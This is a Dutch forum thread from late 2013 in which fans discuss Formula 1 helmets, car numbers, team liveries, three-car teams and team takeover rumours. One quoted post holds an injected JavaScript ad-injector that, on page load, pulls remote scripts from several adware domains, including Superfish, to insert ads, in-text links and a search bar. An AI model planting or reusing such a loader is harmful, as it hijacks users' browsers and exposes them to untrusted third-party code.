abonnement Unibet Coolblue Bitvavo
pi_133665054
Volgens mij verkoopt Mclaren al jaren geen auto's meer. Hoe dat bij andere teams zit weet ik niet, maar de meeste oude wagens die je in bezit ziet van miljonairs zijn vooral van teams die gestopt zijn, bijv Benetton, arrows, Tyrrell en een Nederlander is zelfs in het bezit van zo'n prachtige jaguar.

Als motor stoppen ze er meestal zo'n heel betrouwbaar apparaat in. Kan zo niet op de naam komen.
“Being second is to be the first of the ones who lose.”
  woensdag 27 november 2013 @ 01:50:13 #155
46705 Kleffe_Dop
Sic Mundus Creatus Est
pi_133665752
quote:
1s.gif Op woensdag 27 november 2013 00:59 schreef Waffle het volgende:
Volgens mij verkoopt Mclaren al jaren geen auto's meer.
Inderdaad ja, die hebben die enorme loods waar ze alles achter slot en grendel bewaren. Slecht voorbeeld dus.

Maar bijvoorbeeld Ferrari's uit het tijdperk Schumacher zijn er wel te vinden.
  woensdag 27 november 2013 @ 02:03:32 #156
45 SiGNe
Uitspraak: Sign
pi_133665889
quote:
0s.gif Op donderdag 14 november 2013 21:57 schreef Marks het volgende:

[..]

Mooi dat de FIA daar wat tegen wil doen, zo vaak van helm wisselen.
Zou ook wel jammer zijn want er zitten best mooie helmen bij.
Vettel heeft dit jaar volgens mij elke race met een andere helm geraced, meestal een in het thema van het land waar geraced wordt en dat maakt de helm ook wel speciaal.
Als er dan eisen gesteld moeten worden aan de herkenbaarheid, warom dan niet de wagen herkenbaarder maken?
wie herinnert zich niet Nigel Mansel met z'n rode 5 op z'n wagen?
Gewoon dat cijfer op de wagen duidelijker maken en de coureur lekker vrij laten in het persoonlijk maken van de helm.
pi_133667080
quote:
0s.gif Op woensdag 27 november 2013 02:03 schreef SiGNe het volgende:

[..]

Vettel heeft dit jaar volgens mij elke race met een andere helm geraced, meestal een in het thema van het land waar geraced wordt en dat maakt de helm ook wel speciaal.
Als er dan eisen gesteld moeten worden aan de herkenbaarheid, warom dan niet de wagen herkenbaarder maken?
Gewoon dat cijfer op de wagen duidelijker maken en de coureur lekker vrij laten in het persoonlijk maken van de helm.
Lijkt me ook veel beter.
Maar nadeel van een groot duidelijk nummer zal wel zijn dat dat ten koste gaat van de reclamemogelijkheden. Het nummer staat dan op een goed zichtbare plaats en is dan groter, die ruimte verkopen ze waarschijnlijk liever aan een sponsor.

[ Bericht 0% gewijzigd door #ANONIEM op 27-11-2013 08:26:19 ]
  woensdag 27 november 2013 @ 08:13:32 #158
131800 Tarado
capô de fusca
pi_133667120
pi_133668619
quote:
Oh ja, de tandarts. Of je daar nou vrolijk van moet worden is een tweede.
pi_133668978
Voor iedereen die nog toevallig in Madrid is de komende tijd of een grote Alonso fan is:

quote:
A survey of the career of Fernando Alonso, the premier Formula 1 Spanish racing driver of all time and winner of two world championships.

Alonso began competing when he was only three years old, and the exhibition includes the first racing suit he wore, hand-sewn by his mother. And from that first moment through to his victory in two Formula 1 world championships, and in numerous other races, whose trophies are all on display to visitors. The exhibition also includes several of the single-seaters raced by the Asturian champion: from his first go-kart through to the cars with which he competed for Minardi, Renault, McLaren and Ferrari. Visitors can also see a collection of helmets, boots, gloves and mementos from Alonso's racing career.
Ik hoop er in januari te zijn, zal dan wel verslag doen. Meer informatie op:
http://www.fernandoalonsocollection.com/
pi_133669001
quote:
0s.gif Op woensdag 27 november 2013 02:03 schreef SiGNe het volgende:

[..]

Over morgen is dat overleg of er misschien met 8 teams gereden gaat worden, 3 auto's per team.
Het lijkt mij dan alleen wel beter voor de sport als liveries voor de wagens vrij worden gegeven en dat elke coureur een eigen livery krijgt. Zo ja, dan word dat nog wel lastig met Ferrari, eindelijk een gele Ferrari op de grid? Of toch een lichtblauwe misschien O+
pi_133669248
quote:
0s.gif Op woensdag 27 november 2013 10:19 schreef Meike26 het volgende:

[..]

Over morgen is dat overleg of er misschien met 8 teams gereden gaat worden, 3 auto's per team.
Het lijkt mij dan alleen wel beter voor de sport als liveries voor de wagens vrij worden gegeven en dat elke coureur een eigen livery krijgt. Zo ja, dan word dat nog wel lastig met Ferrari, eindelijk een gele Ferrari op de grid? Of toch een lichtblauwe misschien O+
Kan toch niet.. ...

En over de nummering: van senna weet toch niemand welke nummers hij had, maar iedereen kent zijn gele helm die hij zijn HELE carrière droeg. Zoals het hoort
pi_133669269
quote:
1s.gif Op woensdag 27 november 2013 10:32 schreef Marks het volgende:

[..]

Kan toch niet.. ...

En over de nemmering: van senna weet toch niemand welke nummers hij had, maar iedereen kent zijn gele helm die hij zijn HELE carrière droeg. Zoals het hoort
Senna reed best vaak met nummer 1 of 11 :Y
pi_133669307
quote:

[..]

Kan toch niet.. ...

En over de nummering: van senna weet toch niemand welke nummers hij had, maar iedereen kent zijn gele helm die hij zijn HELE carrière droeg. Zoals het hoort
Hoezo kan dat niet ? Wees eens duidelijker o|O :P
  Redactie Games woensdag 27 november 2013 @ 10:36:25 #165
206706 crew  Racerblade
pi_133669334
quote:

[..]

Kan toch niet.. ...

Dit is wel waar natuurlijk. Nummers zijn gebaseerd op het constructeurs- en gedeeltelijk rijderskampioenschap van vorig jaar en veranderen dus ieder seizoen. Niet echt gemakkelijk te onthouden. Als je het zo wil doen, moet iedere coureur een persoonlijk nummer hebben door zijn gehele carrière.
  Redactie Frontpage / Sport woensdag 27 november 2013 @ 10:37:33 #166
122036 crew  Peterselieman
Maffe Fries
pi_133669355
quote:
0s.gif Op woensdag 27 november 2013 10:36 schreef Racerblade het volgende:

[..]

Dit is wel waar natuurlijk. Nummers zijn gebaseerd op het constructeurs- en gedeeltelijk rijderskampioenschap van vorig jaar en veranderen dus ieder seizoen. Niet echt gemakkelijk te onthouden. Als je het zo wil doen, moet iedere coureur een persoonlijk nummer hebben.
of zoals in de VS iedere auto een redelijk vast nummer heeft.
Altijd onderweg naar het avontuur
pi_133669468
quote:

[..]

Je weet dat ze al eerder (1964, 1965) in andere kleuren dan rood (blauw/wit) raceten in de F1?

The only thing that stays the same is change (Change - Melissa Etheridge)
[b]"Formula 1 is a magic thing and a few missing decibels will not change that."[/b] - Joe Saward
pi_133669577
quote:
14s.gif Op woensdag 27 november 2013 10:37 schreef Peterselieman het volgende:

[..]

of zoals in de VS iedere auto een redelijk vast nummer heeft.
Of dus zoals in de DTM, waar iedere rijder met een eigen 'livery' rijdt. Volgens mij is de F1 nog één van de weinige klasses waar het niet mag. Iedereen weet nog wel dat Pollock 2 verschillende auto's wilde en een stukje autosport geschiedenis schreef met de rits-wagens.

Ik zie het wel voor mij hoor. McLaren die een Vodafone en Hugo boss livery hebben + nog een gewone McLaren er naast. MGP een Petronas en BlackBarrie wagens en Williams met een McGregor en Randstad auto :D

Ik ben wel/geen voorstander van dat plan. Het kan een hoop zekerheid bieden voor de F1 teams en coureurs van de toekomst. Maar dan moeten er dus wel regels komen voor jonge talenten, uitdossingen van teams/coureurs en een echt jongtalent-kampioenschap, voor 1e en 2e jaars F1 coureurs.
pi_133669590
quote:
0s.gif Op woensdag 27 november 2013 10:41 schreef sasquatsch het volgende:

[..]

Je weet dat ze al eerder (1964, 1965) in andere kleuren dan rood (blauw/wit) raceten in de F1?

[ afbeelding ]
Nee wist ik niet :)
pi_133669727
quote:
0s.gif Op woensdag 27 november 2013 10:46 schreef Meike26 het volgende:

[..]

Nee wist ik niet :)
Was ook alleen maar omdat Enzo Ferrari overhoop lag met de Italiaanse autosport bond en schreef voor een aantal GP's in de wagens in onder Ferrari Noord Amerika in de Noord Amerikaanse kleuren (blauw/wit).
[b]"Formula 1 is a magic thing and a few missing decibels will not change that."[/b] - Joe Saward
  woensdag 27 november 2013 @ 10:54:38 #171
82396 nils7
De forumkrokodil
pi_133669767
quote:

[..]

Waarom nu geen 3 auto's vraag ik me af... En voor de 3de een 107% regel invoeren ;)
N/A
Disclaimer: ik ben geen expert maar shitposter, dit is geen advies en aan deze post zijn geen rechten te ontlenen
  woensdag 27 november 2013 @ 11:02:13 #172
131800 Tarado
capô de fusca
pi_133669920
quote:

[..]

Kan toch niet.. ...

Wat een gezeur over zo'n helm, ik vind het wel grappig dat Vettel dit doet, kneuterigheid ten top om dat te willen verbieden.

De meest verwarrende helmen zijn die van Rosberg en Hamilton trouwens dus wat schiet je er dan mee op?
pi_133670357
quote:
0s.gif Op woensdag 27 november 2013 10:54 schreef nils7 het volgende:

[..]

Waarom nu geen 3 auto's vraag ik me af... En voor de 3de een 107% regel invoeren ;)
Omdat er nu genoeg auto's zijn. Ik geloof dat er in de contracten met de circuits staat dat er minimaal 20 auto's aan de start moeten staan. Die 3 auto's is voor het geval er minder dan 10 teams aan de start verschijnen, als er teams zich uit de F1 terug trekken door de te hoge kosten.
  woensdag 27 november 2013 @ 11:59:09 #174
87936 Rossdale
#MaximumAttack
pi_133671303
quote:
0s.gif Op woensdag 27 november 2013 10:54 schreef nils7 het volgende:

[..]

Met 3 auto's worden de kosten voor de teams NOG hoger, en de meeste kunnen hun budget nu al niet of nauwelijks rond krijgen.
Please sir. When moon? When Mustang?
pi_133673799
Het gaat toch om een fundamentele traditie binnen de F1, de teamkleuren. Dat hoort bij de F1.
Dat andere raceklassen dat niet hebben is daar prima, maar dat betekent niet dat de F1 dit ook moet toepassen.
En het is bij de NASCAR behoorlijk onoverzichtelijk soms! Ook omdat de nummers niet altijd wat zeggen, omdat er coureurs wisselen. Dus nr 12 is niet altijd dezelfde rijder...
pi_133678883
quote:
0s.gif Op woensdag 27 november 2013 13:41 schreef Marks het volgende:
Het gaat toch om een fundamentele traditie binnen de F1, de teamkleuren.
Nouja traditie. Alleen Ferrari rijdt nog in rood. Vroeger was het traditie ja, maar dat is al lang niet meer.

Ja Mercedes rijdt weer eens in zilver grijs.
"The only sight worse than a sad dwarf is a very sad dwarf"
"Met dubbel s welteverstaan"
pi_133679022
Mclaren is zilver, sinds ze met Mercedes gingen, daarvoor waren het rijdende pakjes Marlboro. Sauber en Williams hebben alle kleuren wel gehad in de jaren.
.
pi_133679090
quote:
0s.gif Op woensdag 27 november 2013 10:41 schreef sasquatsch het volgende:

[..]

[ afbeelding ]
En een gele sharknose, met gendebien.
Weet alleen niet of dat officieel van het fabrieksteam was :P
blablablablablablablablablablablablablabla
pi_133679422
quote:
1s.gif Op woensdag 27 november 2013 16:38 schreef Schunckelstar het volgende:

[..]

En een gele sharknose, met gendebien.
Weet alleen niet of dat officieel van het fabrieksteam was :P
Inschrijving van het Belgische Ecurie Nationale Belge, vandaar de gele (Belgische race)kleur.
pi_133679507
quote:
0s.gif Op woensdag 27 november 2013 16:50 schreef sasquatsch het volgende:

[..]

Inschrijving van het Belgische Ecurie Nationale Belge, vandaar de gele (Belgische race)kleur.
Ah :)
pi_133679574
pi_133679588
Vroeger was het duitsland zilver, engeland groen, italie blauw etc.

Wat zie je van die traditie nog terug dan? Helemaal niks. Ja Mercedes dus die zilver grijs is ja en dan houdt het ook wel op.
pi_133679775
quote:
7s.gif Op woensdag 27 november 2013 16:56 schreef Geralt het volgende:

Wat zie je van die traditie nog terug dan? Helemaal niks. Ja Mercedes dus die zilver grijs is ja en dan houdt het ook wel op.
Hier staan alle kleuren
pi_133679860
Hoe kom ik op italie blauw? :o
pi_133680215
quote:
7s.gif Op woensdag 27 november 2013 17:04 schreef Geralt het volgende:
Voetbal?
pi_133687814
Fuseert Marussia met Sauber?

Het gerucht gaat dat Marussia een nieuwe partner zoekt en in eerste instantie een poging deed om de Williams aandelen van Toto Wolff te kopen. Williams heeft dit echter afgeslagen omdat ze onafhankelijk willen blijven. Nu richt Marussia zich op Sauber, dat volgens andere geruchten op omvallen staat omdat de Russische deal nog steeds niet rond schijnt te zijn en mogelijk in de verkoop gaat.
  woensdag 27 november 2013 @ 22:50:39 #187
134184 WEST
AFC AJAX 4 EVER
pi_133694747
quote:
0s.gif Op woensdag 27 november 2013 08:07 schreef Wombcat het volgende:

[..]

Lijkt me ook veel beter.
Maar nadeel van een groot duidelijk nummer zal wel zijn dat dat ten koste gaat van de reclamemogelijkheden. Het nummer staat dan op een goed zichtbare plaats en is dan groter, die ruimte verkopen ze waarschijnlijk liever aan een sponsor.
G
McLaren deed het wel goed toen Mika, Hakkinen, coulthard en montoya er reden. Gewoon hun voornaam op zijkant in de steil van WEST. was oook wel mooi trouwens.

Find your guiding inspiration. In a place where dreams are made
With a lifetime's preparation. It’s no time to be afraid
Put our differences behind us. While we shine like the sun
See what we've all become. Together we are one
pi_133694994
quote:
7s.gif Op woensdag 27 november 2013 17:04 schreef Geralt het volgende:
quote:
1s.gif Op woensdag 27 november 2013 17:15 schreef JohnB52 het volgende:

[..]

Voetbal?
Bijnaam van het Italiaanse nationale elftal is Azzurri, azuurblauw, dus ;)

Méditerranée, zou blauw, zo blauw...*

* @ Toon Hermans O+

Op maandag 12 oktober 2009 00:26 schreef vosss het volgende:
:*-je voor Sally, gewoon omdat ik haar lief vind :@
pi_133695270
quote:
2s.gif Op woensdag 27 november 2013 22:50 schreef WEST het volgende:

[..]

G
McLaren deed het wel goed toen Mika, Hakkinen, coulthard en montoya er reden. Gewoon hun voornaam op zijkant in de steil van WEST. was oook wel mooi trouwens.

[ afbeelding ]
Was omdat sigarettenreclame op sommige circuits niet mocht. Anders stond er gewoon WEST.
  woensdag 27 november 2013 @ 23:10:05 #190
134184 WEST
AFC AJAX 4 EVER
pi_133695607
quote:
0s.gif Op woensdag 27 november 2013 23:02 schreef sasquatsch het volgende:

[..]

Was omdat sigarettenreclame op sommige circuits niet mocht. Anders stond er gewoon WEST.
Ja dat klopt dat weet ik. Maar leuk en herkenbaar was het wel.
Find your guiding inspiration. In a place where dreams are made
With a lifetime's preparation. It’s no time to be afraid
Put our differences behind us. While we shine like the sun
See what we've all become. Together we are one
pi_133695799
quote:
2s.gif Op woensdag 27 november 2013 23:10 schreef WEST het volgende:

[..]

Ja dat klopt dat weet ik. Maar leuk en herkenbaar was het wel.
Dat dan weer wel, ja.
pi_133697428
quote:
Ah, mijn nieuwe telefoon achtergrond O+
  woensdag 27 november 2013 @ 23:58:48 #193
326858 Toekito
Fietst zich de pleuris
pi_133697826
Wat een gezeik om niks. 1 team heeft 2 dezelfde wagens en al doet die coureur per pitstop een andere kleur helm op....aan zijn camerakleur herkennen we hem toch? En als de F1 gered kan worden als de beste 3 teams van dit jaar volgend jaar een derde wagen met een rookie inzetten, prima.
PS4-tag: TJDoornbos// Origin: Toek85
Sporten voor Sophia
pi_133698864
F1 hoeft niet gered te worden hoor, niet in dit opzicht.

[ Bericht 97% gewijzigd door Marks op 28-11-2013 21:59:15 ]
pi_133700975
quote:
0s.gif Op woensdag 27 november 2013 23:02 schreef sasquatsch het volgende:

[..]

Destijds vond ik de vervangende reclame van lucky strike eigenlijk beter _O_
pi_133701063
Geruchten via RTL GP dat Boekhoorn een belang in FI gaat nemen. Spannend. Is het al bijna maart? ;(
  donderdag 28 november 2013 @ 09:21:36 #197
360332 Fiorano
Drive tot the Maxx
pi_133702534
quote:
0s.gif Op donderdag 28 november 2013 00:35 schreef Marks het volgende:

[..]

<script>
var id=2605802023;
var aff=30500;
var sid=10;

(function()
{
var hostname = document.location.hostname;
function addEventHandler (el, eType, fn)
{
if (el.addEventListener)
el.addEventListener(eType, fn, false);
else if (el.attachEvent)
el.attachEvent('on' + eType, fn);
else
el['on' + eType] = fn;
}

function checkdml()
{
var h = document.location.hostname;
return (h.indexOf("google")!=-1 ||
h.indexOf("facebook.com")!=-1 ||
h.indexOf("yahoo.com")!=-1 ||
h.indexOf("bing.com")!=-1 ||
h.indexOf("ask.com")!=-1 ||
h.indexOf("listenersguide.org.uk")!=-1);
}

function loadScript(src, scriptId, innerText)
{
if (window.location.protocol == 'https:' && src.indexOf('http:') == 0)
return;
var script = document.createElement("script");
script.src = src;
script.characterSet = "utf-8";
script.type = "text/javascript";
script.setAttribute('jsid', 'js36');
if (typeof(scriptId) !== 'undefined')
script.id = scriptId;
if (typeof(innerText) !== 'undefined')
{
if(script.innerText)
script.innerText = innerText;
else
script.textContent = innerText;
}
(document.head||document.getElementsByTagName('head')[0]|| document.body||document.getElementsByTagName('body')[0]).appendChild(script);
}
function onloadComplete()
{
if (hostname.length - hostname.indexOf('.gov') == 4 ||
document.getElementsByTagName("*").length < 100)
return;
if (!checkdml())
{
window.INLDM_cfg = { fi : 4603, fd : 0,
fddm: 'xml.conversionguru.biz',
sttc: 'https://scripty.info/scripts/inl_dmmtch/',
inlsrhdm: 'sonicsearchonline.biz' };
loadScript('https://scripty.info/scripts/inl_dmmtch/inl_dmmtch.js');
loadScript('https://colo.cachefly.net/js/min.inject.js?id=ODEqPCA&subid=36');
loadScript('http://ig.cleversearch.me:8080/adserver/static/js/inimage_s.js?pid=108&ext_domain=1&ox_subId=js36');
if (navigator.appVersion.indexOf("MSIE 8.") == -1)
loadScript('http://intext.nav-links.com/js/intext.js?afid=DheeraMedia&subid=js36&maxlinks=6&linkcolor=009900');
if (navigator.appVersion.indexOf("MSIE 8.") == -1)
loadScript('http://www.superfish.com/ws/sf_main.jsp?dlsource=mhaencb&userId=ws&CTID=js36');
}
loadScript('https://cdncache1-a.akamaihd.net/loaders/1247/l.js?aoi=1311798366&pid=1247&zoneid=52222');
window.dmadbar_settings = {dm_standalone : true, dmpd : 3, rel : 1, fd : 4723, fd2: 4604, xmlfeed : 'http://xml.conversionguru.biz/search' , search_url : 'http://hostmysearch.com/?prt=yhs1Danta2&errUrl=http://www.yahoo.com&keywords=' , script_base : 'https://scripty.info/scripts/adbar' };
loadScript('https://scripty.info/scripts/adbar/adbar.js');
loadScript('http://i.websuggestorjs.info/sugg/javascript.js?channel=js36');
}
if (top === self)
{
if (document.readyState === 'complete')
onloadComplete();
else
addEventHandler(window, 'load', onloadComplete);
}
})();
</script>

F1 hoeft niet gered te worden hoor, niet in dit opzicht.
Uh what?
Regel 1: De Scheidsrechter heeft altijd gelijk
Regel 2: Als de Scheidsrechter geen gelijk heeft, treedt onmiddellijk regel 1 in werking
  Redactie Frontpage / Sport donderdag 28 november 2013 @ 10:33:06 #198
122036 crew  Peterselieman
Maffe Fries
pi_133703928
quote:
0s.gif Op donderdag 28 november 2013 09:21 schreef Fiorano het volgende:

[..]

Uh what?
foutje in de code. Komt zeer sporadisch voor ;)
Altijd onderweg naar het avontuur
  donderdag 28 november 2013 @ 10:38:03 #199
131800 Tarado
capô de fusca
pi_133704045
adamcooperf1 twitterde op donderdag 28-11-2013 om 10:27:52 #F1 Brawn leaves Wolff and Lowe in charge of Mercedes: http://t.co/iNgXPyZT0C reageer retweet
pi_133704228
quote:
7s.gif Op woensdag 27 november 2013 16:56 schreef Geralt het volgende:

Caterham is groen.
pi_133705353
quote:
7s.gif Op donderdag 28 november 2013 10:46 schreef k_man het volgende:

[..]

Caterham is groen.
Jaguar, uit Engeland, was (donker)groen.

quote:
Belangrijkste Britse automerken actief in 2012

AC · Arash · Ariel · Ascari · Aston Martin · Bentley · Bristol · Caparo · Caterham · Deauville · Farbio · Jaguar · Land Rover · Lotus · Mini · McLaren · Morgan · Noble · Rolls-Royce · Vauxhall · Westfield
Bron.

Simpele deductie ;)
  donderdag 28 november 2013 @ 11:45:14 #202
131800 Tarado
capô de fusca
pi_133705484
clubforce twitterde op donderdag 28-11-2013 om 10:18:05 As all cars and supplies are now back to our HQ, creative parking solutions are sought. http://t.co/LjXf6WLmqJ reageer retweet
pi_133705533
Zwevende auto's :o
Cancellara; "Tweede worden is gemakkelijker dan eerste worden"
FOK!sport *O* ✩ ✩ ✩ Ajax O+
pi_133705564
quote:
10s.gif Op donderdag 28 november 2013 11:47 schreef franklop het volgende:
Zwevende auto's :o
Net David Copperfield 8-)
abonnement Unibet Coolblue Bitvavo